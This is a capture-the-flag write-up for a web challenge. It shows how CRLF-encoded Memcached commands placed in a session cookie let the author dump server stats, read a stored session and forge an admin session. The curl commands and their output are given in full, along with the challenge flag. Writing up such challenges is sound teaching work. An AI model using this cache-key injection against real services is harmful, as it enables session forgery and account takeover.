Rating:
# Login As Admin!(2)
| http://login2.chal.mmactf.link/ | Web | 200 points |
|---------------------------------|-----|------------|
This challenge, at first, didn't seem vulnerable. Using the test credentials that were provided, we see that a random token is assigned to the user in a cookie named `ss`.
I finally stumbled onto something interesting when I submited a request the cookie `ss` present but with an empty value.
$ curl "http://login2.chal.mmactf.link/" --cookie "ss="
[...]
MemcacheError:ERROR
[...]
So it is using Memcache. Maybe it is injectable. In Memcached, commands are separated by a newline. Let's give it a shot.
$ curl "http://login2.chal.mmactf.link/" --cookie "ss=%0d%0astats"
MemcacheError:ERROR
STAT pid 2524
STAT uptime 262912
STAT time 1441757879
STAT version 1.4.14 (Ubuntu)
STAT libevent 2.0.21-stable
STAT pointer_size 64
STAT rusage_user 16.020000
STAT rusage_system 36.012000
STAT curr_connections 5
[...]
END
At this point, I figured that the cookie that is given to the user is used as a key in the database which tells who the user is.
$ curl "http://login2.chal.mmactf.link/" --cookie "ss=%0d%0aget 770e33cbe1d236a5233adacd95995e2f8ca71a21b65eb756d7f894647b6168c2"
[...]
{"username"":"test"}
[...]
To become admin, we'll make our own session token with the `admin` username.
$ curl "http://login2.chal.mmactf.link/" --cookie "ss=%0d%0aset adminkey 0 3600 20%0d%0a{\"username\":\"admin\"}"
STORED
Finally, let's query the website.
$ curl "http://login2.chal.mmactf.link/" --cookie "ss=adminkey"
You are "admin" user.
Flag is "MMA{61016d84e70e0b5ed5c03e4e398c3571}
